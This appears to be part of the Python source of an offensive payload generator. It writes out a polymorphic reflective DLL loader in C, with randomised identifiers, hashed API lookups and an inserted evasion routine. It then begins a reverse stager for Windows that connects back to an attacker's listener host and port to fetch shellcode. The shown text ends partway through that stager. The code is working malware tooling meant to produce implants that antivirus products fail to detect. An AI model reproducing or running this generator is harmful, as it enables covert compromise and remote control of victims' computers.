    RLoader = "ReflectiveLoader"  #ModOpt["Loadername"]

    RandLoadLibDef = varname_creator()
    RandGetProcAddrDef = varname_creator()
    RandVirtualAllocDef = varname_creator()
    RandNtFlushInstrCacheDef = varname_creator()

    RandHinstance = varname_creator()
    RandSt1 = varname_creator()
    RandLoadLib = varname_creator()
    RandGetProcAddr = varname_creator()
    RandVirtualAlloc = varname_creator()
    RandNtFlushCache = varname_creator()
    Randflag = varname_creator()
    RandHValue = varname_creator()
    RandDllAddr = varname_creator()
    RandExportDir = varname_creator()
    RandOrdName = varname_creator()
    RandArrAddr = varname_creator()
    RandArrName = varname_creator()
    RandUint1 = varname_creator()
    RandUint2 = varname_creator()
    RandUint3 = varname_creator()
    RandUint4 = varname_creator()
    RandUint5 = varname_creator()
    RandHeader = varname_creator()
    RandBaseAddr = varname_creator()

    Ret_code = ""

    Include_List = [
        "#include <stdlib.h>\n", "#include <windows.h>\n",
        "#include <stdio.h>\n", "#include <string.h>\n", "#include <time.h>\n",
        "#include <math.h>\n"
    ]

    Ret_code += IncludeShuffler(Include_List)

    Ret_code += "#include <tlhelp32.h>\n"
    Ret_code += "#include \"ReflectiveLoader.h\"\n"

    Ret_code += "#define _ReturnAddress() __builtin_return_address(0)\n"
    Ret_code += "HINSTANCE hAppInstance = NULL;\n"  #####
    Ret_code += "#pragma intrinsic( _ReturnAddress )\n"

    Ret_code += "__declspec(noinline) ULONG_PTR " + RandSt1 + "(VOID) { return (ULONG_PTR)_ReturnAddress(); }\n"

    Ret_code += "DLLEXPORT ULONG_PTR WINAPI " + RLoader + "(VOID){\n"

    Ret_code += RandLoadLibDef + " " + RandLoadLib + " = NULL;\n"
    Ret_code += RandGetProcAddrDef + " " + RandGetProcAddr + " = NULL;\n"
    Ret_code += RandVirtualAllocDef + " " + RandVirtualAlloc + " = NULL;\n"
    Ret_code += RandNtFlushInstrCacheDef + " " + RandNtFlushCache + " = NULL;\n"
    Ret_code += "ULONG_PTR " + RandDllAddr + " = " + RandSt1 + "();\n"
    Ret_code += "ULONG_PTR " + RandArrAddr + ";\n"
    Ret_code += "ULONG_PTR " + RandArrName + ";\n"
    Ret_code += "ULONG_PTR " + RandExportDir + ";\n"
    Ret_code += "ULONG_PTR " + RandOrdName + ";\n"
    Ret_code += "DWORD " + RandHValue + ";\n"
    Ret_code += "ULONG_PTR " + RandUint1 + ";\n"
    Ret_code += "ULONG_PTR " + RandUint2 + ";\n"
    Ret_code += "ULONG_PTR " + RandUint3 + ";\n"
    Ret_code += "ULONG_PTR " + RandUint4 + ";\n"
    Ret_code += "ULONG_PTR " + RandUint5 + ";\n"
    Ret_code += "ULONG_PTR " + RandHeader + ";\n"

    #Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += "$:EVA\n"

    Ret_code += "while(TRUE){\n"
    Ret_code += "if(((PIMAGE_DOS_HEADER)" + RandDllAddr + ")->e_magic == IMAGE_DOS_SIGNATURE){\n"
    Ret_code += RandHeader + " = ((PIMAGE_DOS_HEADER)" + RandDllAddr + ")->e_lfanew;\n"
    Ret_code += "if(" + RandHeader + " >= sizeof(IMAGE_DOS_HEADER) && " + RandHeader + " < 1024){\n"
    Ret_code += RandHeader + " += " + RandDllAddr + ";\n"
    Ret_code += "if(((PIMAGE_NT_HEADERS)" + RandHeader + ")->Signature == IMAGE_NT_SIGNATURE) break;}}\n"
    Ret_code += RandDllAddr + "--;}\n"

    if ModOpt["Arch"] == "x64":

        Ret_code += "ULONG_PTR " + RandBaseAddr + " = __readgsqword(0x60);\n"
    else:
        Ret_code += "ULONG_PTR " + RandBaseAddr + " = __readfsdword(0x30);\n"  # 32 bit

    Ret_code += RandBaseAddr + " = (ULONG_PTR)((_PPEB)" + RandBaseAddr + ")->pLdr;\n"
    Ret_code += RandUint1 + " = (ULONG_PTR)((PPEB_LDR_DATA)" + RandBaseAddr + ")->InMemoryOrderModuleList.Flink;\n"
    Ret_code += "while(" + RandUint1 + "){\n"
    Ret_code += "USHORT " + Randflag + ";\n"
    Ret_code += RandUint2 + " = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)" + RandUint1 + ")->BaseDllName.pBuffer;\n"
    Ret_code += Randflag + " = ((PLDR_DATA_TABLE_ENTRY)" + RandUint1 + ")->BaseDllName.Length;\n"
    Ret_code += RandUint3 + " = 0;\n"
    Ret_code += "do{\n"
    Ret_code += RandUint3 + " = ror((DWORD)" + RandUint3 + " );\n"
    Ret_code += "if(*((BYTE *)" + RandUint2 + ") >= 'a'){\n"
    Ret_code += RandUint3 + " += *((BYTE *)" + RandUint2 + ") - 0x20;\n"
    Ret_code += "}else{\n"
    Ret_code += RandUint3 + " += *((BYTE *)" + RandUint2 + ");}\n"
    Ret_code += RandUint2 + "++;\n"
    Ret_code += "}while( --" + Randflag + ");\n"
    Ret_code += "if((DWORD)" + RandUint3 + " == 0x6A4ABC5B){\n"
    Ret_code += RandBaseAddr + " = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)" + RandUint1 + ")->DllBase;\n"
    Ret_code += RandExportDir + " = " + RandBaseAddr + " + ((PIMAGE_DOS_HEADER)" + RandBaseAddr + ")->e_lfanew;\n"
    Ret_code += RandArrName + " = (ULONG_PTR)&((PIMAGE_NT_HEADERS)" + RandExportDir + ")->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];\n"
    Ret_code += RandExportDir + " = (" + RandBaseAddr + " + ((PIMAGE_DATA_DIRECTORY)" + RandArrName + ")->VirtualAddress);\n"
    Ret_code += RandArrName + " = (" + RandBaseAddr + " + ((PIMAGE_EXPORT_DIRECTORY )" + RandExportDir + ")->AddressOfNames);\n"
    Ret_code += RandOrdName + " = ( " + RandBaseAddr + " + ((PIMAGE_EXPORT_DIRECTORY )" + RandExportDir + ")->AddressOfNameOrdinals);\n"
    Ret_code += Randflag + " = 3;\n"
    Ret_code += "while(" + Randflag + " > 0){\n"
    Ret_code += RandHValue + " = hash((char *)(" + RandBaseAddr + " + *(DWORD *)(" + RandArrName + ")));\n"
    Ret_code += "if( " + RandHValue + " == 0xEC0E4E8E || " + RandHValue + " == 0x7C0DFCAA || " + RandHValue + " == 0x91AFCA54){\n"
    Ret_code += RandArrAddr + " = (" + RandBaseAddr + " + ((PIMAGE_EXPORT_DIRECTORY )" + RandExportDir + ")->AddressOfFunctions);\n"
    Ret_code += RandArrAddr + " += (*(WORD *)( " + RandOrdName + ") * sizeof(DWORD));\n"
    Ret_code += "if( " + RandHValue + " == 0xEC0E4E8E ){\n"
    Ret_code += RandLoadLib + " = (" + RandLoadLibDef + ")( " + RandBaseAddr + " + *(DWORD *)( " + RandArrAddr + " ));\n"
    Ret_code += "}else if( " + RandHValue + " == 0x7C0DFCAA ){\n"
    Ret_code += RandGetProcAddr + " = (" + RandGetProcAddrDef + ")(" + RandBaseAddr + " + *(DWORD *)( " + RandArrAddr + "));\n"
    Ret_code += "}else if( " + RandHValue + " == 0x91AFCA54 ){\n"
    Ret_code += RandVirtualAlloc + " = (" + RandVirtualAllocDef + ")(" + RandBaseAddr + " + *(DWORD *)(" + RandArrAddr + "));}\n"
    Ret_code += Randflag + "--;}\n"
    Ret_code += RandArrName + " += sizeof(DWORD);\n"
    Ret_code += RandOrdName + " += sizeof(WORD);}\n"
    Ret_code += "}else if((DWORD)" + RandUint3 + " == 0x3CFA685D){\n"
    Ret_code += RandBaseAddr + " = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)" + RandUint1 + ")->DllBase;\n"
    Ret_code += RandExportDir + " = " + RandBaseAddr + " + ((PIMAGE_DOS_HEADER)" + RandBaseAddr + ")->e_lfanew;\n"
    Ret_code += RandArrName + " = (ULONG_PTR)&((PIMAGE_NT_HEADERS)" + RandExportDir + ")->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];\n"
    Ret_code += RandExportDir + " = (" + RandBaseAddr + " + ((PIMAGE_DATA_DIRECTORY)" + RandArrName + ")->VirtualAddress);\n"
    Ret_code += RandArrName + " = (" + RandBaseAddr + " + ((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir + ")->AddressOfNames);\n"
    Ret_code += RandOrdName + " = (" + RandBaseAddr + " + ((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir + ")->AddressOfNameOrdinals);\n"
    Ret_code += Randflag + " = 1;\n"
    Ret_code += "while(" + Randflag + " > 0){\n"
    Ret_code += RandHValue + " = hash((char *)(" + RandBaseAddr + " + *(DWORD *)(" + RandArrName + ")));\n"
    Ret_code += "if( " + RandHValue + " == 0x534C0AB8 ){\n"
    Ret_code += RandArrAddr + " = (" + RandBaseAddr + " + ((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir + ")->AddressOfFunctions);\n"
    Ret_code += RandArrAddr + " += (*(WORD *)(" + RandOrdName + ") * sizeof(DWORD));\n"
    Ret_code += "if( " + RandHValue + " == 0x534C0AB8){\n"
    Ret_code += RandNtFlushCache + " = (" + RandNtFlushInstrCacheDef + ")(" + RandBaseAddr + " + *(DWORD *)(" + RandArrAddr + "));}\n"
    Ret_code += Randflag + "--;}\n"
    Ret_code += RandArrName + " += sizeof(DWORD);\n"
    Ret_code += RandOrdName + " += sizeof(WORD);}}\n"
    Ret_code += "if(" + RandLoadLib + " && " + RandGetProcAddr + " && " + RandVirtualAlloc + " && " + RandNtFlushCache + " ) break;\n"
    Ret_code += RandUint1 + " = *(UINT_PTR *)(" + RandUint1 + ");}\n"
    Ret_code += RandHeader + " = " + RandDllAddr + " + ((PIMAGE_DOS_HEADER)" + RandDllAddr + ")->e_lfanew;\n"
    Ret_code += RandBaseAddr + " = (ULONG_PTR)" + RandVirtualAlloc + "(NULL,((PIMAGE_NT_HEADERS)" + RandHeader + ")->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );\n"
    Ret_code += RandUint1 + " = ((PIMAGE_NT_HEADERS)" + RandHeader + ")->OptionalHeader.SizeOfHeaders;\n"
    Ret_code += RandUint2 + " = " + RandDllAddr + ";\n"
    Ret_code += RandUint3 + " = " + RandBaseAddr + ";\n"
    Ret_code += "while( " + RandUint1 + "-- )\n"
    Ret_code += "*(BYTE *)" + RandUint3 + "++ = *(BYTE *)" + RandUint2 + "++;\n"
    Ret_code += RandUint1 + " = ((ULONG_PTR)&((PIMAGE_NT_HEADERS)" + RandHeader + ")->OptionalHeader + ((PIMAGE_NT_HEADERS)" + RandHeader + ")->FileHeader.SizeOfOptionalHeader );\n"
    Ret_code += RandUint5 + " = ((PIMAGE_NT_HEADERS)" + RandHeader + ")->FileHeader.NumberOfSections;\n"
    Ret_code += "while(" + RandUint5 + "--){\n"
    Ret_code += RandUint2 + " = (" + RandBaseAddr + " + ((PIMAGE_SECTION_HEADER)" + RandUint1 + ")->VirtualAddress);\n"
    Ret_code += RandUint3 + " = (" + RandDllAddr + " + ((PIMAGE_SECTION_HEADER)" + RandUint1 + ")->PointerToRawData);\n"
    Ret_code += RandUint4 + " = ((PIMAGE_SECTION_HEADER)" + RandUint1 + ")->SizeOfRawData;\n"
    Ret_code += "while(" + RandUint4 + "--)\n"
    Ret_code += "*(BYTE *)" + RandUint2 + "++ = *(BYTE *)" + RandUint3 + "++;\n"
    Ret_code += RandUint1 + " += sizeof(IMAGE_SECTION_HEADER);}\n"
    Ret_code += RandUint2 + " = (ULONG_PTR)&((PIMAGE_NT_HEADERS)" + RandHeader + ")->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];\n"
    Ret_code += RandUint3 + " = (" + RandBaseAddr + " + ((PIMAGE_DATA_DIRECTORY)" + RandUint2 + ")->VirtualAddress);\n"
    Ret_code += "while(((PIMAGE_IMPORT_DESCRIPTOR)" + RandUint3 + ")->Name){\n"
    Ret_code += RandDllAddr + " = (ULONG_PTR)" + RandLoadLib + "((LPCSTR)( " + RandBaseAddr + " + ((PIMAGE_IMPORT_DESCRIPTOR)" + RandUint3 + ")->Name));\n"
    Ret_code += RandUint4 + " = (" + RandBaseAddr + " + ((PIMAGE_IMPORT_DESCRIPTOR)" + RandUint3 + ")->OriginalFirstThunk);\n"
    Ret_code += RandUint1 + " = (" + RandBaseAddr + " + ((PIMAGE_IMPORT_DESCRIPTOR)" + RandUint3 + ")->FirstThunk);\n"
    Ret_code += "while(*(UINT_PTR *)(" + RandUint1 + ")){\n"
    Ret_code += "if(" + RandUint4 + " && ((PIMAGE_THUNK_DATA)" + RandUint4 + ")->u1.Ordinal & IMAGE_ORDINAL_FLAG){\n"
    Ret_code += RandExportDir + " = " + RandDllAddr + " + ((PIMAGE_DOS_HEADER)" + RandDllAddr + ")->e_lfanew;\n"
    Ret_code += RandArrName + " = (ULONG_PTR)&((PIMAGE_NT_HEADERS)" + RandExportDir + ")->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];\n"
    Ret_code += RandExportDir + " = (" + RandDllAddr + " + ((PIMAGE_DATA_DIRECTORY)" + RandArrName + ")->VirtualAddress);\n"
    Ret_code += RandArrAddr + " = (" + RandDllAddr + " + ((PIMAGE_EXPORT_DIRECTORY )" + RandExportDir + ")->AddressOfFunctions);\n"
    Ret_code += RandArrAddr + " += ((IMAGE_ORDINAL(((PIMAGE_THUNK_DATA)" + RandUint4 + ")->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir + ")->Base) * sizeof(DWORD));\n"
    Ret_code += "*(UINT_PTR *)(" + RandUint1 + ") = (" + RandDllAddr + " + *(DWORD *)(" + RandArrAddr + "));\n"
    Ret_code += "}else{\n"
    Ret_code += RandUint2 + " = (" + RandBaseAddr + " + *(UINT_PTR *)(" + RandUint1 + "));\n"
    Ret_code += "*(UINT_PTR *)(" + RandUint1 + ") = (ULONG_PTR)" + RandGetProcAddr + "((HMODULE)" + RandDllAddr + ",(LPCSTR)((PIMAGE_IMPORT_BY_NAME)" + RandUint2 + ")->Name);}\n"
    Ret_code += RandUint1 + " += sizeof(ULONG_PTR);\n"
    Ret_code += "if(" + RandUint4 + "){\n"
    Ret_code += RandUint4 + " += sizeof(ULONG_PTR);}}\n"
    Ret_code += RandUint3 + " += sizeof(IMAGE_IMPORT_DESCRIPTOR);}\n"
    Ret_code += RandDllAddr + " = " + RandBaseAddr + " - ((PIMAGE_NT_HEADERS)" + RandHeader + ")->OptionalHeader.ImageBase;\n"
    Ret_code += RandUint2 + " = (ULONG_PTR)&((PIMAGE_NT_HEADERS)" + RandHeader + ")->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];\n"
    Ret_code += "if( ((PIMAGE_DATA_DIRECTORY)" + RandUint2 + ")->Size ){\n"
    Ret_code += RandUint3 + " = (" + RandBaseAddr + " + ((PIMAGE_DATA_DIRECTORY)" + RandUint2 + ")->VirtualAddress);\n"
    Ret_code += "while(((PIMAGE_BASE_RELOCATION)" + RandUint3 + ")->SizeOfBlock ){\n"
    Ret_code += RandUint1 + " = (" + RandBaseAddr + " + ((PIMAGE_BASE_RELOCATION)" + RandUint3 + ")->VirtualAddress);\n"
    Ret_code += RandUint2 + " = (((PIMAGE_BASE_RELOCATION)" + RandUint3 + ")->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof( IMAGE_RELOC );\n"
    Ret_code += RandUint4 + " = " + RandUint3 + " + sizeof(IMAGE_BASE_RELOCATION);\n"
    Ret_code += "while(" + RandUint2 + "--){\n"
    Ret_code += "if(((PIMAGE_RELOC)" + RandUint4 + ")->type == IMAGE_REL_BASED_DIR64){\n"
    Ret_code += "*(ULONG_PTR *)(" + RandUint1 + " + ((PIMAGE_RELOC)" + RandUint4 + ")->offset) += " + RandDllAddr + ";\n"
    Ret_code += "}else if(((PIMAGE_RELOC)" + RandUint4 + ")->type == IMAGE_REL_BASED_HIGHLOW){\n"
    Ret_code += "*(DWORD *)(" + RandUint1 + " + ((PIMAGE_RELOC)" + RandUint4 + ")->offset) += (DWORD)" + RandDllAddr + ";\n"
    #//ARMQUI
    Ret_code += "}else if(((PIMAGE_RELOC)" + RandUint4 + ")->type == IMAGE_REL_BASED_HIGH){\n"
    Ret_code += "*(WORD *)(" + RandUint1 + " + ((PIMAGE_RELOC)" + RandUint4 + ")->offset) += HIWORD(" + RandDllAddr + ");\n"
    Ret_code += "}else if(((PIMAGE_RELOC)" + RandUint4 + ")->type == IMAGE_REL_BASED_LOW){\n"
    Ret_code += "*(WORD *)(" + RandUint1 + " + ((PIMAGE_RELOC)" + RandUint4 + ")->offset) += LOWORD(" + RandDllAddr + ");}\n"  #RIGHT??
    Ret_code += RandUint4 + " += sizeof( IMAGE_RELOC );}\n"
    Ret_code += RandUint3 + " = " + RandUint3 + " + ((PIMAGE_BASE_RELOCATION)" + RandUint3 + ")->SizeOfBlock;}}\n"
    Ret_code += RandUint1 + " = (" + RandBaseAddr + " + ((PIMAGE_NT_HEADERS)" + RandHeader + ")->OptionalHeader.AddressOfEntryPoint);\n"
    Ret_code += RandNtFlushCache + "((HANDLE)-1, NULL, 0);\n"
    Ret_code += "((DLLMAIN)" + RandUint1 + ")((HINSTANCE)" + RandBaseAddr + ", DLL_PROCESS_ATTACH, NULL);\n"

    #Ret_code += "$:END\n"

    #Ret_code = JunkInjector(Ret_code,ModOpt["JI"],ModOpt["JF"],ModOpt["EF"],ModOpt["JR"])

    Ret_code += "return " + RandUint1 + ";}\n"

    WriteSource("ReflectiveLoader.c", Ret_code)

    Ret_code = ""
    #    Ret_code += "#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H\n"
    #    Ret_code += "#define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H\n"
    Ret_code += "#define WIN32_LEAN_AND_MEAN\n"
    Ret_code += "#include <winsock2.h>\n"
    Ret_code += "#include <windows.h>\n"
    Ret_code += "#include <intrin.h>\n"
    Ret_code += "#define DLL_QUERY_HMODULE		6\n"
    #    Ret_code += "#define DEREF( name )*(UINT_PTR *)(name)\n"
    #    Ret_code += "#define DEREF_64( name )*(DWORD64 *)(name)\n"
    #    Ret_code += "#define DEREF_32( name )*(DWORD *)(name)\n"
    #    Ret_code += "#define DEREF_16( name )*(WORD *)(name)\n"
    #    Ret_code += "#define DEREF_8( name )*(BYTE *)(name)\n"

    Ret_code += "typedef ULONG_PTR (WINAPI * REFLECTIVELOADER)( VOID );\n"
    Ret_code += "typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );\n"

    Ret_code += "#define DLLEXPORT  __declspec( dllexport )\n"

    Ret_code += "typedef HMODULE (WINAPI * " + RandLoadLibDef + ")( LPCSTR );\n"
    Ret_code += "typedef FARPROC (WINAPI * " + RandGetProcAddrDef + ")( HMODULE, LPCSTR );\n"
    Ret_code += "typedef LPVOID  (WINAPI * " + RandVirtualAllocDef + ")( LPVOID, SIZE_T, DWORD, DWORD );\n"
    Ret_code += "typedef DWORD  (NTAPI * " + RandNtFlushInstrCacheDef + ")( HANDLE, PVOID, ULONG );\n"

    #    Ret_code += "#define KERNEL32DLL_HASH				0x6A4ABC5B\n"
    #    Ret_code += "#define NTDLLDLL_HASH				0x3CFA685D\n"

    #    Ret_code += "#define LOADLIBRARYA_HASH				0xEC0E4E8E\n"
    #    Ret_code += "#define GETPROCADDRESS_HASH				0x7C0DFCAA\n"
    #    Ret_code += "#define VIRTUALALLOC_HASH				0x91AFCA54\n"
    #    Ret_code += "#define NTFLUSHINSTRUCTIONCACHE_HASH	                0x534C0AB8\n"
    Ret_code += "#define HASH_KEY						13\n"

    Ret_code += "#pragma intrinsic( _rotr )\n"

    Ret_code += "__forceinline DWORD ror( DWORD d )\n"
    Ret_code += "{\n"
    Ret_code += "	return _rotr( d, HASH_KEY );\n"
    Ret_code += "}\n"

    Ret_code += "__forceinline DWORD hash( char * c )\n"
    Ret_code += "{\n"
    Ret_code += "    register DWORD h = 0;\n"
    Ret_code += "	do\n"
    Ret_code += "	{\n"
    Ret_code += "		h = ror( h );\n"
    Ret_code += "        h += *c;\n"
    Ret_code += "	} while( *++c );\n"
    Ret_code += "    return h;\n"
    Ret_code += "}\n"
    Ret_code += "typedef struct _UNICODE_STR\n"
    Ret_code += "{\n"
    Ret_code += "  USHORT Length;\n"
    Ret_code += "  USHORT MaximumLength;\n"
    Ret_code += "  PWSTR pBuffer;\n"
    Ret_code += "} UNICODE_STR, *PUNICODE_STR;\n"

    Ret_code += "typedef struct _LDR_DATA_TABLE_ENTRY\n"
    Ret_code += "{\n"
    Ret_code += "LIST_ENTRY InMemoryOrderModuleList;\n"
    Ret_code += "LIST_ENTRY InInitializationOrderModuleList;\n"
    Ret_code += "PVOID DllBase;\n"
    Ret_code += "PVOID EntryPoint;\n"
    Ret_code += "ULONG SizeOfImage;\n"
    Ret_code += "UNICODE_STR FullDllName;\n"
    Ret_code += "	UNICODE_STR BaseDllName;\n"
    Ret_code += "	ULONG Flags;\n"
    Ret_code += "	SHORT LoadCount;\n"
    Ret_code += "	SHORT TlsIndex;\n"
    Ret_code += "	LIST_ENTRY HashTableEntry;\n"
    Ret_code += "	ULONG TimeDateStamp;\n"
    Ret_code += "} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;\n"

    Ret_code += "typedef struct _PEB_LDR_DATA\n"
    Ret_code += "{\n"
    Ret_code += "   DWORD dwLength;\n"
    Ret_code += "   DWORD dwInitialized;\n"
    Ret_code += "   LPVOID lpSsHandle;\n"
    Ret_code += "   LIST_ENTRY InLoadOrderModuleList;\n"
    Ret_code += "   LIST_ENTRY InMemoryOrderModuleList;\n"
    Ret_code += "   LIST_ENTRY InInitializationOrderModuleList;\n"
    Ret_code += "   LPVOID lpEntryInProgress;\n"
    Ret_code += "} PEB_LDR_DATA, * PPEB_LDR_DATA;\n"

    Ret_code += "typedef struct _PEB_FREE_BLOCK\n"
    Ret_code += "{\n"
    Ret_code += "   struct _PEB_FREE_BLOCK * pNext;\n"
    Ret_code += "   DWORD dwSize;\n"
    Ret_code += "} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;\n"

    Ret_code += "typedef struct __PEB\n"
    Ret_code += "{\n"
    Ret_code += "   BYTE bInheritedAddressSpace;\n"
    Ret_code += "   BYTE bReadImageFileExecOptions;\n"
    Ret_code += "   BYTE bBeingDebugged;\n"
    Ret_code += "   BYTE bSpareBool;\n"
    Ret_code += "   LPVOID lpMutant;\n"
    Ret_code += "   LPVOID lpImageBaseAddress;\n"
    Ret_code += "   PPEB_LDR_DATA pLdr;\n"
    Ret_code += "   LPVOID lpProcessParameters;\n"
    Ret_code += "   LPVOID lpSubSystemData;\n"
    Ret_code += "   LPVOID lpProcessHeap;\n"
    Ret_code += "   PRTL_CRITICAL_SECTION pFastPebLock;\n"
    Ret_code += "   LPVOID lpFastPebLockRoutine;\n"
    Ret_code += "   LPVOID lpFastPebUnlockRoutine;\n"
    Ret_code += "   DWORD dwEnvironmentUpdateCount;\n"
    Ret_code += "   LPVOID lpKernelCallbackTable;\n"
    Ret_code += "   DWORD dwSystemReserved;\n"
    Ret_code += "   DWORD dwAtlThunkSListPtr32;\n"
    Ret_code += "   PPEB_FREE_BLOCK pFreeList;\n"
    Ret_code += "   DWORD dwTlsExpansionCounter;\n"
    Ret_code += "   LPVOID lpTlsBitmap;\n"
    Ret_code += "   DWORD dwTlsBitmapBits[2];\n"
    Ret_code += "   LPVOID lpReadOnlySharedMemoryBase;\n"
    Ret_code += "   LPVOID lpReadOnlySharedMemoryHeap;\n"
    Ret_code += "   LPVOID lpReadOnlyStaticServerData;\n"
    Ret_code += "   LPVOID lpAnsiCodePageData;\n"
    Ret_code += "   LPVOID lpOemCodePageData;\n"
    Ret_code += "   LPVOID lpUnicodeCaseTableData;\n"
    Ret_code += "   DWORD dwNumberOfProcessors;\n"
    Ret_code += "   DWORD dwNtGlobalFlag;\n"
    Ret_code += "   LARGE_INTEGER liCriticalSectionTimeout;\n"
    Ret_code += "   DWORD dwHeapSegmentReserve;\n"
    Ret_code += "   DWORD dwHeapSegmentCommit;\n"
    Ret_code += "   DWORD dwHeapDeCommitTotalFreeThreshold;\n"
    Ret_code += "   DWORD dwHeapDeCommitFreeBlockThreshold;\n"
    Ret_code += "   DWORD dwNumberOfHeaps;\n"
    Ret_code += "   DWORD dwMaximumNumberOfHeaps;\n"
    Ret_code += "   LPVOID lpProcessHeaps;\n"
    Ret_code += "   LPVOID lpGdiSharedHandleTable;\n"
    Ret_code += "   LPVOID lpProcessStarterHelper;\n"
    Ret_code += "   DWORD dwGdiDCAttributeList;\n"
    Ret_code += "   LPVOID lpLoaderLock;\n"
    Ret_code += "   DWORD dwOSMajorVersion;\n"
    Ret_code += "   DWORD dwOSMinorVersion;\n"
    Ret_code += "   WORD wOSBuildNumber;\n"
    Ret_code += "   WORD wOSCSDVersion;\n"
    Ret_code += "   DWORD dwOSPlatformId;\n"
    Ret_code += "   DWORD dwImageSubsystem;\n"
    Ret_code += "   DWORD dwImageSubsystemMajorVersion;\n"
    Ret_code += "   DWORD dwImageSubsystemMinorVersion;\n"
    Ret_code += "   DWORD dwImageProcessAffinityMask;\n"
    Ret_code += "   DWORD dwGdiHandleBuffer[34];\n"
    Ret_code += "   LPVOID lpPostProcessInitRoutine;\n"
    Ret_code += "   LPVOID lpTlsExpansionBitmap;\n"
    Ret_code += "   DWORD dwTlsExpansionBitmapBits[32];\n"
    Ret_code += "   DWORD dwSessionId;\n"
    Ret_code += "   ULARGE_INTEGER liAppCompatFlags;\n"
    Ret_code += "   ULARGE_INTEGER liAppCompatFlagsUser;\n"
    Ret_code += "   LPVOID lppShimData;\n"
    Ret_code += "   LPVOID lpAppCompatInfo;\n"
    Ret_code += "   UNICODE_STR usCSDVersion;\n"
    Ret_code += "   LPVOID lpActivationContextData;\n"
    Ret_code += "   LPVOID lpProcessAssemblyStorageMap;\n"
    Ret_code += "   LPVOID lpSystemDefaultActivationContextData;\n"
    Ret_code += "   LPVOID lpSystemAssemblyStorageMap;\n"
    Ret_code += "   DWORD dwMinimumStackCommit;\n"
    Ret_code += "} _PEB, * _PPEB;\n"

    Ret_code += "typedef struct\n"
    Ret_code += "{\n"
    Ret_code += "	WORD	offset:12;\n"
    Ret_code += "	WORD	type:4;\n"
    Ret_code += "} IMAGE_RELOC, *PIMAGE_RELOC;\n"
    #    Ret_code += "#endif\n"

    WriteSource("ReflectiveLoader.h", Ret_code)
def RevHttpStager_C_windows(ModOpt):

    Lhost = CheckForBackslash(ModOpt["Lhost"])
    Lport = ModOpt["Lport"]
    MemAlloc = ModOpt["MemAlloc"]
    ExecMethod = ModOpt["ExecMethod"]

    Randlpv = varname_creator()
    Randlpv2 = varname_creator()
    Randpointer2 = varname_creator()
    Randbuff = varname_creator()
    Randversion = varname_creator()
    Randwsadata = varname_creator()
    RandRevtarget = varname_creator()
    Randsock = varname_creator()
    RandSocket = varname_creator()
    RandRecv_int = varname_creator()

    Arch = ModOpt["Arch"]
    MemAlloc = ModOpt["MemAlloc"]
    ExecMethod = ModOpt["ExecMethod"]

    if ModOpt["MemAlloc"] in ["SharedSection", "SS"]:

        ModOpt["Buff"] = Randlpv
        ModOpt["Lpvoid"] = varname_creator()
    else:
        ModOpt["Buff"] = Randlpv
        ModOpt["Lpvoid"] = Randlpv

    ModOpt["Decoder"] = "False"

    ModOpt["Bufflen"] = "1000000"

    Ret_code = ""
    Ret_code += "#define _WIN32_WINNT 0x0500\n"
    Ret_code += "#include <winsock2.h>\n"

    IncludeList = [
        "#include <stdlib.h>\n", "#include <windows.h>\n",
        "#include <stdio.h>\n", "#include <string.h>\n", "#include <time.h>\n",
        "#include <math.h>\n"
    ]

    Ret_code += IncludeShuffler(IncludeList) + "#include <tlhelp32.h>\n"

    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    Ret_code += "char * " + Randlpv + ";\n"
    Ret_code += "WORD " + Randversion + " = MAKEWORD(2,2);WSADATA " + Randwsadata + ";\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()
        WS2_32 = varname_creator()
        NdcWSAStartup = varname_creator()
        NdcWSACleanup = varname_creator()
        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + WS2_32 + " = GetModuleHandle(\"ws2_32.dll\");\n"
        Ret_code += "FARPROC " + NdcWSAStartup + " = GetProcAddress(" + WS2_32 + ", \"WSAStartup\");\n"
